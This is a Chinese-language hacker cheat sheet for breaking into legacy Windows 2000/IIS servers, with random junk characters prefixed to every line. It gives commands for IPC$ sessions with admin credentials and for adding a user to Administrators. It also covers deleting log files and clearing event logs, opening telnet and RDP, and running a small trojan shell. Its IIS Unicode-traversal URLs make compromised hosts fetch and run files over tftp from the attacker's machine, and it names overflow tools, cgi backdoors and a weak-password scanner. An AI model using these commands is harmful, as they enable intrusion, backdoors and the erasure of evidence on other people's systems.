网管和黑客都必须知道的命令
b.mcP@ 常用的几条NET命令:
!&'GWQY{( ]S@zhQ (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
RLy(Wz3% ?VUU[h8"v5 (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
k!?sHUAj d}@b 3 (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
K/xn4N_UX Y fRjr (查看远程主机时间) net time \\IP地址
t1Ty.F)r nHAET (定时启动某个程序) at \\IP地址 02:18 readme.exe
eh\_;2P S#h-X(4 (查看共享) net view \\IP地址
~
_ ogeD Yatd$`,hW (查看netbios工作组列表) nbtstat -A IP地址
5`Q* kYbqb? (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
~quof> 'q3<R%^Q (这两条把自己增加到管理员组): net user 用户名 密码 /add
_C`&(?} z$64Ep# net localgroup Administrators 用户名 /add
+D7>$&BD x*H,eY3 (断开连接) net use \\IP地址\ipc$ /delete
* {avx 8
5 L< 扫尾:
GkwdBy+ /!7 del C:\winnt\system32\logfiles\*.*
bsuGZ z):LF< del C:\winnt\ssytem32\config\*.evt
b/[$bZD5o v2w|?26Lf del C:\winnt\system32\dtclog\*.*
eILdq* tQR qQ del C:\winnt\system32\*.log
hn`yc7<}(u %mqep5n( del C:\winnt\system32\*.txt
]>vC.iYp `!,"">5 del C:\winnt\*.txt
.rPg xUW\P$ del C:\winnt\*.log
WK2YHJ*$ >W?i+,g 一、netsvc.exe
cn~/P|B[ Nm{+!}cC 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
()'yY^ .1{:Q1"S netsvc /list \\IP地址
"A(D}~i PiwMl)E|! netsvc schedule \\IP地址 /query
h(~@
nd{ wH?]kV8Q netsvc \\IP地址 schedule /start
Z;ze{Vb v(0IQ 二、OpenTelnet.exe
'zJBp 9a% e
w%rc.; 远程启动主机的Telnet服务,并绑定端口到7878,例如:
!n`9V^` 4h*c{do OpenTelnet \\IP地址 用户名 密码 1 7878
%LM2CgH
V |*fi!nvk@ 然后就可以telnet到主机的7878端口,进入DOS方式下:
dI(1L~ K#%@4]jO3 telnet IP地址 7878
C.|.0^5 q1^bH6*fl 三、winshell.exe
&0*7]Wo* ]D.}
/g 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
I]@QhCm0 p=XEMVqm p Path (查看winshell主程序的路径信息)
(X?HuWTm po! [Nd&" b reBoot (重新启动机器)
uVth&4dh9 QbJE+m5 d shutDown (关闭机器)
>sm~te$5 R+*-i+]Q#7 s Shell (执行后你就会看到可爱的“C:\>”)
g+j\wvx0 01n7ua*XX x eXit (退出本次登录会话,此命令并不终止winshell的运行)
@?n~v^ ?vBMx _0 CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
*ZkOZ K3*-lO:A9 四、3389登陆器,GUI方式登录远程主机的
H73 r3BH Pk3b#$+E 五、elsave.exe
^/ff)'.J Eo`'6
3 事件日志清除工具
v8"Zru z8dBfA<z elsave -s \\IP地址 -l "application" -C
'F%h]4|1 /g>]J70 elsave -s \\IP地址 -l "system" -C
g8R@ol0 M?00n< vM elsave -s \\IP地址 -l "security" -C
=B{B?B"r \"a~~Koe 执行后成功清除应用程序日志,系统日志,安全日志
B)x^S
> e +Ikw1y"f 六、hbulot.exe
!lL~#l:F "sSY[6Kp! 开启win2kserver和winxp的3389服务
.wO-2h{Q 'kSm}}y hbulot [/r]
s-4qK(ml- >l b9 j> 使用/r表示安装完成后自动重起目标使设置生效。
F AQx8P k?}y@$[) 七、nc.exe(netcat.exe)
l(pP*2 Obx!>mI^6 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
@rv)J[7Y& q%/\ 想要连接到某处: nc [-options] hostname port[s] [ports] ...
% kaV?j M_O) w^
' 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
~#dfZa& *EPJeblAV 参数:
$3S`A]xO 9T\\hM)k -e prog 程序重定向,一旦连接,就执行 [危险!!]
!S'!oinV 8{
+KNqz -g gateway source-routing hop point[s], up to 8
z:8ieJ)C o?d`o$ -G num source-routing pointer: 4, 8, 12, ...
L@S1C=-/ <Zo{D |hW -h 帮助信息
n0FzDQt26 "H9q%S,FH -i secs 延时的间隔
k*rG^imX j|>^wB -l 监听模式,用于入站连接
\8)FVpS .)E1|U[L -n 指定数字的IP地址,不能用hostname
a`D`v5G t 7ju^B/7 -o file 记录16进制的传输
Eb8~i_B- OGcW]i -p port 本地端口号
,ZZ5A;) h05BZrE -r 任意指定本地及远程端口
YB_fy8Tfx O<J<)_W) -s addr 本地源地址
l\TL=8u2c
hT%
>)71 -u UDP模式
,=[r6k< y:Ag mr,S -v 详细输出——用两个-v可得到更详细的内容
Ih[k{p ltv~Kh -w secs timeout的时间
ctPT=i60 &"=O!t2 -z 将输入输出关掉——用于扫描时
/ <+F/R'=O 八、TFTPD32.EXE
}&]T0U`@ tlYB'8bJY 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
N+vsQ!Qz z2jS(N?J1 http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
hb(H-`16 ex.^V sf_ 然后可以直接令文件运行:
lm*C:e)4A iM$iZ;Tp http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
+fHqGZ] 94?/Rhs5 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
h(i_'P? 8g?2( MT; 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
Y}h&dAr 39x
4( 一、一 Xscan命令行运行参数说明:
%6x3G Knp}88DR^j 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
59(kk; J&L#^f*d 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
55Xfu/hQ Xif>ZL?aXb xscan -file <主机列表文件名> <检测项目> [其他选项]
#dFE}!"#` yQq|!'MK k 其中<检测项目> 含义如下:
qykI[4 [;#^h/5E -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
xs?]DJj )h,}v()qc# -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
bRJ]avR
^vZu[m -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
(hIe!"s* pIPjTQ?cq -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
Gb.}af#v ^Yo2 R -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
Pa{bkr ?{~. }Vn [其他选项] 含义如下:
p3B_NsXVZ
UoJMOw[ -v: 显示详细扫描进度
PI)uBA; BPu>_$C -p: 跳过Ping不通的主机
d 1 O+qS 6Z-[-0o+g -o: 跳过没有检测到开放端口的主机
~2UmX' } 7i}dyQv} -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10